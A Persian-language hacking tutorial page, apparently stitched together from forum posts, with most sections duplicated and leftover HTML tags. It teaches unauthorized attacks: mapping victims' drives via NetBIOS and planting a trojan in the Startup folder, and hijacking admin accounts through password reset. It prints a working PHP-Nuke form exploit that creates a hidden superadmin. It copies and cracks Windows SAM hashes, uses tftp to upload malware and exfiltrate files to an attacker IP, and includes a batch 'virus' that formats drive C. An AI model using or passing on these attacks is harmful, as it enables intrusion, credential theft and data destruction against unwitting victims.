آموزش هک سایت
سلام دوستان
امیدوارم از این آموزش سو استفاده نکنید
خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که PHP-Nuke است بپردازیم.
اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید.
در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته! حالا باید به سیستم طرف برای نصب تروجان نفوذ کنید و نت بایوس بهترین راه هست!
نفوذ به سیستم از طریق NetBios
-------------------------------------------
با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... ) البته من این مقاله رو به صورت تصویری هم تو سایت گذاشتم ، می تونید دانلود کنید.
خب بریم سره موضوع اصلی:
اول باید IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
Net use x: \IPDriveName$
به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:
Net use x: \80.191.191.39c$
اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.
اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید ) (نویسنده : فرشاد عزیز)
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟
پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند.
--------------------------------------------------------------------------------
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>
--------------------------------------------------------------------------------
خوب در قسمتی از کد نوشته شده: http://www.sitename.com/admin.php
به جای sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید.
به این صورت : exploit.html
حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن Create Admin را کلیک کنید و مستقیما به http://www.sitename.com/admin.php میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک هک کردید!
موفق باشید
امیدوارم از این آموزش سو استفاده نکنید
خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که PHP-Nuke است بپردازیم.
اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید.
در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته! حالا باید به سیستم طرف برای نصب تروجان نفوذ کنید و نت بایوس بهترین راه هست!
نفوذ به سیستم از طریق NetBios
-------------------------------------------
با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... ) البته من این مقاله رو به صورت تصویری هم تو سایت گذاشتم ، می تونید دانلود کنید.
خب بریم سره موضوع اصلی:
اول باید IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
Net use x: \IPDriveName$
به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:
Net use x: \80.191.191.39c$
اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.
اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید ) (نویسنده : فرشاد عزیز)
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟
پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند.
--------------------------------------------------------------------------------
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>
--------------------------------------------------------------------------------
خوب در قسمتی از کد نوشته شده: http://www.sitename.com/admin.php
به جای sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید.
به این صورت : exploit.html
حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن Create Admin را کلیک کنید و مستقیما به http://www.sitename.com/admin.php میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک هک کردید!
موفق باشید
======================================================
هک کردن پسوورد admin
کلا روش های زیادی برای پیدا کردن پسورد ادمین ویندوز های NT 2K & XP وجود داره اما من ترجیح می دم از روش کرک SaM پسورد را بدست بیارم متاسفانه بزرگ ترین ضعف امنیتی مایکروسافت در SaM بر می گرده به Encrypt این فایل ها
که با متد 64bit انکریپت و یا بهتره بگم Hash شده و این به کرکرها اجازه رو می ده که با یک مقدار دقت حتی بتونه به خوبی هارد دیسک هایی را که با Format NTFS قالب بندی شده و SaM فایل ها Encode شده اند رو Decode کنند!!
اما ما برای بدست آوردن فایل های SaM باید دو نوع فایل رو در نظر بگیریم
یکی SaM Registry و دیگری System Registry که در هنگام عملیات کرک به این دو فایل مهم که در مسیرهای
CODE
c:windowssystem32configSAM
و
CODE
c:windowssystem32configsystem
می باشندنیاز داریم البته این دو فایل به طور کاملا پیچیده ای Encode شده اند که اگر ما سیستم رو با ویندوز بالا بیاریم نمی توانیم این دو فایل رو از پوشه های بالا بدست بیاریم و حتما باید نیاز به سیستم عامل Dos و البته یک برنامه کمپرس گر که Dos رو پشتیبانی کنه داریم من برنامه کمپرس گر PK Zip 2.50 رو پیشنهاد می کنم !!!
http://garbo.uwasa.fi/pub/pc/arcers/pk250dos.exe
شما این برنامه رو دریافت کنید و اجرا کنید محتویات کمپرس گر UnZip می شود کلیه فایل های UnZip شده را در یک فلاپی دیسک قرار دهید و فلاپی را بیرون بیاورید!
مرحله بعد:
خوب با سیستم Dos بالا می آیم یا یک Startup دیسک فرقی نمی کنه مهم این هست که با Dos سیستم رو بوت کنیم!!
البته دقت کنید که اگر با Startup می خواهید سیستم رو بالا بیاورید محتویات فایل MsConfig.sys حتما این موارد رو داشته باشد
CODE
DEVICE=himem.sys
dos = high, umb
چک کنید در دیسکت Startup خود حتما فایل himem.sys باشد اگر نیست می توانید از اینجا دریافت کرده و به دیسک Startup اضافه کنید
Download himem.sys
http://www.techadvice.cc/files/s29k...-Disk/himem.sys
ما با این کار ایمان پیدا می کنیم که اگر با دسکت Startup سیستم رو بوت می کنیم حتما RAM بالاتر از 32MB رو پشتیبانی می کنه!!
حال وقتی سیستم رو با Dos بوت کردید دیسکت کمپرس گر PkZip را داخل سیستم گذاشته و عبارت زیر را تایپ کنید!!
CODE
pkzip c:Crack.zip c:windowssystem32configSAM c:windowssystem32configsystem
دقت کنید بین دو کلمه Sam و C: یک جای خالی یا Space وارد کنید بعد Enter کنید!!
درواقع ما با این دستور دو فایل مهم SaM Registry و System Registry رو در پوشه های بالا استخراج کرده و به صورت فشرده در درایو C با نام Crack.zip ایجاد کردیم!!
البته هنگام عمیات اجرا سیستم از ما کمک می خواهد مه عرض می کنم!
وقتی دستور بالا رو دادیم بعد از یک دقیقه سیستم خطای command.com می ده شما باید دیسکت کمپرس گر را در آورده و دیسکت Startup رو بزنید و برای ادامه کلیدی را بزنید و سپس تمام !!
فایل Crack.zip در درایو C ایجاد شد!!
حالا سیستم رو Restart می کنیم و با ویندوز بالا می آوریم با Winzip فایل مورد نظر یعنی Crack.zip را در پوشه ای UnPack می کنیم حالا نیاز به یک کرکر قوی
یعنی برنامه ProActive Windows Security Explorer داریم شما می توانید این برنامه رو از اینجا دریافت کنید!!
Download SaM Cracker
http://www.persianhacker.net/downlo...tion=file&id=30
خوب این برنامه رو باز می کنیم در کادر وسط Registry Files رو تیک می زنیم و دکمه Dump رو فشار می دهیم صفحه ای باز شده و از ما محل دو فایل Sam Registry و SystemRegistry به ترتیب در Browse پایین و بالا می خواهد مسیر دو فایل را از پوشه Unpack شده Crack.zip انتخاب کرده و در نهایت Dump رو یک بار دیگر می زنیم و پس از یک ساعت تمام!!
پسورد به نمایش در می آید!!!
من هیچ گونه مسولیتی در قبال این آموزش را به عهده نمی گیرم
در ادامه این مطلب به زودی نحوه بدست آوردن SaM فایل ها برای سیستم هایی که هارد دیسکی دارند که درایوهایشان با فرمت NTFS قالب بندی شده اند رو می گم
یادم رفت یک چیزی رو بگم می تونیم از روش Cain و البته کرکر قدرتمند LC5 استفاده کنیم منتها به علت .... بنده نتونستم LC5 کرک شده رو گیر بیارم و پولی بود
موفق باشید!! منبع پی سی ورد تایپیک آموزش
که با متد 64bit انکریپت و یا بهتره بگم Hash شده و این به کرکرها اجازه رو می ده که با یک مقدار دقت حتی بتونه به خوبی هارد دیسک هایی را که با Format NTFS قالب بندی شده و SaM فایل ها Encode شده اند رو Decode کنند!!
اما ما برای بدست آوردن فایل های SaM باید دو نوع فایل رو در نظر بگیریم
یکی SaM Registry و دیگری System Registry که در هنگام عملیات کرک به این دو فایل مهم که در مسیرهای
CODE
c:windowssystem32configSAM
و
CODE
c:windowssystem32configsystem
می باشندنیاز داریم البته این دو فایل به طور کاملا پیچیده ای Encode شده اند که اگر ما سیستم رو با ویندوز بالا بیاریم نمی توانیم این دو فایل رو از پوشه های بالا بدست بیاریم و حتما باید نیاز به سیستم عامل Dos و البته یک برنامه کمپرس گر که Dos رو پشتیبانی کنه داریم من برنامه کمپرس گر PK Zip 2.50 رو پیشنهاد می کنم !!!
http://garbo.uwasa.fi/pub/pc/arcers/pk250dos.exe
شما این برنامه رو دریافت کنید و اجرا کنید محتویات کمپرس گر UnZip می شود کلیه فایل های UnZip شده را در یک فلاپی دیسک قرار دهید و فلاپی را بیرون بیاورید!
مرحله بعد:
خوب با سیستم Dos بالا می آیم یا یک Startup دیسک فرقی نمی کنه مهم این هست که با Dos سیستم رو بوت کنیم!!
البته دقت کنید که اگر با Startup می خواهید سیستم رو بالا بیاورید محتویات فایل MsConfig.sys حتما این موارد رو داشته باشد
CODE
DEVICE=himem.sys
dos = high, umb
چک کنید در دیسکت Startup خود حتما فایل himem.sys باشد اگر نیست می توانید از اینجا دریافت کرده و به دیسک Startup اضافه کنید
Download himem.sys
http://www.techadvice.cc/files/s29k...-Disk/himem.sys
ما با این کار ایمان پیدا می کنیم که اگر با دسکت Startup سیستم رو بوت می کنیم حتما RAM بالاتر از 32MB رو پشتیبانی می کنه!!
حال وقتی سیستم رو با Dos بوت کردید دیسکت کمپرس گر PkZip را داخل سیستم گذاشته و عبارت زیر را تایپ کنید!!
CODE
pkzip c:Crack.zip c:windowssystem32configSAM c:windowssystem32configsystem
دقت کنید بین دو کلمه Sam و C: یک جای خالی یا Space وارد کنید بعد Enter کنید!!
درواقع ما با این دستور دو فایل مهم SaM Registry و System Registry رو در پوشه های بالا استخراج کرده و به صورت فشرده در درایو C با نام Crack.zip ایجاد کردیم!!
البته هنگام عمیات اجرا سیستم از ما کمک می خواهد مه عرض می کنم!
وقتی دستور بالا رو دادیم بعد از یک دقیقه سیستم خطای command.com می ده شما باید دیسکت کمپرس گر را در آورده و دیسکت Startup رو بزنید و برای ادامه کلیدی را بزنید و سپس تمام !!
فایل Crack.zip در درایو C ایجاد شد!!
حالا سیستم رو Restart می کنیم و با ویندوز بالا می آوریم با Winzip فایل مورد نظر یعنی Crack.zip را در پوشه ای UnPack می کنیم حالا نیاز به یک کرکر قوی
یعنی برنامه ProActive Windows Security Explorer داریم شما می توانید این برنامه رو از اینجا دریافت کنید!!
Download SaM Cracker
http://www.persianhacker.net/downlo...tion=file&id=30
خوب این برنامه رو باز می کنیم در کادر وسط Registry Files رو تیک می زنیم و دکمه Dump رو فشار می دهیم صفحه ای باز شده و از ما محل دو فایل Sam Registry و SystemRegistry به ترتیب در Browse پایین و بالا می خواهد مسیر دو فایل را از پوشه Unpack شده Crack.zip انتخاب کرده و در نهایت Dump رو یک بار دیگر می زنیم و پس از یک ساعت تمام!!
پسورد به نمایش در می آید!!!
من هیچ گونه مسولیتی در قبال این آموزش را به عهده نمی گیرم
در ادامه این مطلب به زودی نحوه بدست آوردن SaM فایل ها برای سیستم هایی که هارد دیسکی دارند که درایوهایشان با فرمت NTFS قالب بندی شده اند رو می گم
یادم رفت یک چیزی رو بگم می تونیم از روش Cain و البته کرکر قدرتمند LC5 استفاده کنیم منتها به علت .... بنده نتونستم LC5 کرک شده رو گیر بیارم و پولی بود
موفق باشید!! منبع پی سی ورد تایپیک آموزش
-------------------------------------------------------------------------------------------------------
نفوذ به کمک نرم افزار
وقتی که ما از یک Server و یا یک Client با استفاده از باگ آن (بطور مثال Lsass ,Dcom ,IIS ,Apache,Mysql ,...) یک سطح دسترسی (Shell ) می گیریم می تونیم اونجا مثل Command pormpt سیستم خودمون کارائی انجام بدیم و لی برای ارسال و دریافت فایل باید از tftp استفاده کنیم .کلاینت این برنامه در شاخه ی System32 همه ی سیستم عامل های windows هستش و شما می تونید با اجرا کردن tftp که از اینجا میتونید داونلودش کنید در سیستم خودتون نقش Server رو بازی کنید و چون به کلاینت اون دسترسی دارید بهش دستور ارسال و دریافت از Server تون که تو سیستم شما در حال اجراست رو بدید (یک ارتباط Client & ُServer ای )
خوب برای شروع این کار بعد از DowanloadکردنTftpاز اینجا فایل tftpd32.exe رو از توش اجرا کنید و قتی که باز شد
می تونید ip خودتون رو اونجا ببینید اگه اولش 192 داشت یا به بیانی Unvalid بود برین اینجا و ip valid خودتون رو ببینید چون به این ip احتیاج داریم .بعدش دکمه ی Browse رو تو tFtp بزنید و به طور مثال دایرکتری Desktop رو بهش بدید و بعدش show Dir رو تو برنامه بزنید و فایلی رو که میخواین به سیستم طرف انتقال بدین رو انتخاب کنید مثلآ Server.exe
خوب حالا برید تو shell ای که ازش گرفتین و به tFtp اون دستور بدید که Server.exe رو بگیره برای این کار از این دستور استفاده کنید Tftp -i 62.32.45.67 get server.exe که این ip همون ip ای هستش که از تو سایت گرفتیم (ip خودتون) دستور get برای اینه که به tFtp اون بگه فایل رو بگیره . شما در هر دایرکتری در سیستم طرف که باشید این فایل همون جا کپی مس شه و تو shell مینویسه Transfer Successful
حال برای اینکه بتونیم فایلی رو از سیستمش بگیریم باید بریم تو همون شاخه ای که اون فایل هست تو shell بعد اونجا بنویسیم
tFtp -i 62.32.45.67 post aks.jpg با این دستور فایل ( عکس و برنامه و ..) رو که از سیستم اون برای شما می فرسته که درصد فایل های ارسالی و دریافتی تو tFtp قابل مشاهده هستش
این روش ارسال و دریافت رو برای شلی که با iRcHaTaN Ps 7.1 از سیستم قربانی میگیدید هم میتونید استفاده کنید
برای ارسال: Tftp -i 62.32.45.67 get server.exe
برای دریافت: Tftp -i 62.32.45.67 post server.exe
وقتی که ما از یک Server و یا یک Client با استفاده از باگ آن (بطور مثال Lsass ,Dcom ,IIS ,Apache,Mysql ,...) یک سطح دسترسی (Shell ) می گیریم می تونیم اونجا مثل Command pormpt سیستم خودمون کارائی انجام بدیم و لی برای ارسال و دریافت فایل باید از tftp استفاده کنیم .کلاینت این برنامه در شاخه ی System32 همه ی سیستم عامل های windows هستش و شما می تونید با اجرا کردن tftp که از اینجا میتونید داونلودش کنید در سیستم خودتون نقش Server رو بازی کنید و چون به کلاینت اون دسترسی دارید بهش دستور ارسال و دریافت از Server تون که تو سیستم شما در حال اجراست رو بدید (یک ارتباط Client & ُServer ای )
خوب برای شروع این کار بعد از DowanloadکردنTftpاز اینجا فایل tftpd32.exe رو از توش اجرا کنید و قتی که باز شد
می تونید ip خودتون رو اونجا ببینید اگه اولش 192 داشت یا به بیانی Unvalid بود برین اینجا و ip valid خودتون رو ببینید چون به این ip احتیاج داریم .بعدش دکمه ی Browse رو تو tFtp بزنید و به طور مثال دایرکتری Desktop رو بهش بدید و بعدش show Dir رو تو برنامه بزنید و فایلی رو که میخواین به سیستم طرف انتقال بدین رو انتخاب کنید مثلآ Server.exe
خوب حالا برید تو shell ای که ازش گرفتین و به tFtp اون دستور بدید که Server.exe رو بگیره برای این کار از این دستور استفاده کنید Tftp -i 62.32.45.67 get server.exe که این ip همون ip ای هستش که از تو سایت گرفتیم (ip خودتون) دستور get برای اینه که به tFtp اون بگه فایل رو بگیره . شما در هر دایرکتری در سیستم طرف که باشید این فایل همون جا کپی مس شه و تو shell مینویسه Transfer Successful
حال برای اینکه بتونیم فایلی رو از سیستمش بگیریم باید بریم تو همون شاخه ای که اون فایل هست تو shell بعد اونجا بنویسیم
tFtp -i 62.32.45.67 post aks.jpg با این دستور فایل ( عکس و برنامه و ..) رو که از سیستم اون برای شما می فرسته که درصد فایل های ارسالی و دریافتی تو tFtp قابل مشاهده هستش
این روش ارسال و دریافت رو برای شلی که با iRcHaTaN Ps 7.1 از سیستم قربانی میگیدید هم میتونید استفاده کنید
برای ارسال: Tftp -i 62.32.45.67 get server.exe
برای دریافت: Tftp -i 62.32.45.67 post server.exe
----------------------------------------------------------------------------------
ساخت یک ویروس
ابتدا یه فایل Note Pad باز کنین و نوشته های کادر زیر رو بصورت کامل توی فایلی که ساختین کپی کنین ، بعد این فایل رو با پسوند bat ذخیره کنین ( به این صورت که از منوی File ، گزینه Save As رو انتخاب کنین و بعد از گذاشتن اسم مورد نظر در انتهایش ، عبارت bat. را قرار دهید تا فایل با پسوند bat ذخیره شود ) ... حالا ویروس شما آماده است ... امیدوارم رو سیستم خودتون بازش نکنین ...
@echo off
call attrib -r -h c:autoexec.bat
echo @echo off >c:autoexec.b
echo format /autotest c:/q>nul
call attrib +r +h c:autoexec.ba
exit
</body>
</html>
</body>
</html>
</body>
</html>
</body>
</html>
</body>
</html>
ابتدا یه فایل Note Pad باز کنین و نوشته های کادر زیر رو بصورت کامل توی فایلی که ساختین کپی کنین ، بعد این فایل رو با پسوند bat ذخیره کنین ( به این صورت که از منوی File ، گزینه Save As رو انتخاب کنین و بعد از گذاشتن اسم مورد نظر در انتهایش ، عبارت bat. را قرار دهید تا فایل با پسوند bat ذخیره شود ) ... حالا ویروس شما آماده است ... امیدوارم رو سیستم خودتون بازش نکنین ...
@echo off
call attrib -r -h c:autoexec.bat
echo @echo off >c:autoexec.b
echo format /autotest c:/q>nul
call attrib +r +h c:autoexec.ba
exit
</body>
</html>
</body>
</html>
</body>
</html>
</body>
</html>
</body>
</html>
=============================================
معرفی روش هایی که توسط اونها قربانیتون رو هیچ وقت گم نمیکنید!!!!!!!
این دفعه برای شما دوستان می خواهم درباره متد یا روشی صحبت کنم که شما دیگر قربانی خود را گم نمی کنید ؛ البته به هیچ وجه منظورم اسب تروا و .... نیست و نیازی به نصب هیچ برنامه خاصی هم ندارد ، البته هدفم بیشتر درباره مبحث IP های دینامیک و رفع مشکل آنها است .
شاید شده تا به حال به یک کامپیوتر نفوذ کرده باشید ولی فهمیده باشید که IP آن استاتیک نیست (توسط دستور nslookup ) و آن ماشین برای شما ارزش زیادی داشته باشد ! این قضیه برای من چند دفعه تکرار شده است حتی به وضع فجیع تر ؛ یادم می آید که وقتی به یک شبکه نفوذ کرده بودم (فکر بد نکنید ، خودشان خواسته بودند !!) هدفم یک ماشین بود که اپراتور (یک چیزی تو مایه های مدیر ) از آن برای چک کردن سیستم و رفع مشکلات مدیریتی و ... استفاده می کرد ؛ آن ماشین IP دینامیک داشت و البته هر 7-8 دقیقه باز هم تغییر میکرد کار با آن خیلی مشکل بود ، چون نمی شود روشها را روی آن حتی تست کرد تا سوراخی پیدا کرد ، البته هیچ سرویسی هم ارائه نمی داد ، ما یک جور هایی به آن دست پیدا کردیم اما نمیتوانستم دسترسی را نگه دارم و ... ؛ خوب حالا شما قضیه را دریافتید و با مشکل آشنا شدید ؛ برای رفع این مشکل ما یک کار ساده کردیم و آن هم استفاده از Dynamic DNS بود! البته ابزارهایی هم وجود دارد که صلاح نمی بینم فعلا نام ببرم ! ولی یک راه حل بسیار خوب استفاده از سایتهای زیر است :
1. http://www.dyndns.org
2. http://www.tzo.com
3. http://www.dhs.org
این را هم اضافه کنم که شما در این سایتها ثبت نام کرده و بعد از گذراندن مراحل ثبت نام برای ماشین قربانی یک نام اختصاص می دهید ، و با وارد کردن آن نام در قسمت URL مرورگر شما به سمت قربانی هدایت می شوید حتی با اینکه IP قربانی تغییر کند !! البته در شرایطی که کلاس آن تغییر نکند !!!
با استفاده از این روش ها کارهای خیلی جالبی میشه انجام داد
بقیشو خودتون پیدا کنید
شاید شده تا به حال به یک کامپیوتر نفوذ کرده باشید ولی فهمیده باشید که IP آن استاتیک نیست (توسط دستور nslookup ) و آن ماشین برای شما ارزش زیادی داشته باشد ! این قضیه برای من چند دفعه تکرار شده است حتی به وضع فجیع تر ؛ یادم می آید که وقتی به یک شبکه نفوذ کرده بودم (فکر بد نکنید ، خودشان خواسته بودند !!) هدفم یک ماشین بود که اپراتور (یک چیزی تو مایه های مدیر ) از آن برای چک کردن سیستم و رفع مشکلات مدیریتی و ... استفاده می کرد ؛ آن ماشین IP دینامیک داشت و البته هر 7-8 دقیقه باز هم تغییر میکرد کار با آن خیلی مشکل بود ، چون نمی شود روشها را روی آن حتی تست کرد تا سوراخی پیدا کرد ، البته هیچ سرویسی هم ارائه نمی داد ، ما یک جور هایی به آن دست پیدا کردیم اما نمیتوانستم دسترسی را نگه دارم و ... ؛ خوب حالا شما قضیه را دریافتید و با مشکل آشنا شدید ؛ برای رفع این مشکل ما یک کار ساده کردیم و آن هم استفاده از Dynamic DNS بود! البته ابزارهایی هم وجود دارد که صلاح نمی بینم فعلا نام ببرم ! ولی یک راه حل بسیار خوب استفاده از سایتهای زیر است :
1. http://www.dyndns.org
2. http://www.tzo.com
3. http://www.dhs.org
این را هم اضافه کنم که شما در این سایتها ثبت نام کرده و بعد از گذراندن مراحل ثبت نام برای ماشین قربانی یک نام اختصاص می دهید ، و با وارد کردن آن نام در قسمت URL مرورگر شما به سمت قربانی هدایت می شوید حتی با اینکه IP قربانی تغییر کند !! البته در شرایطی که کلاس آن تغییر نکند !!!
با استفاده از این روش ها کارهای خیلی جالبی میشه انجام داد
بقیشو خودتون پیدا کنید
---------------------------------------------------------------------------------------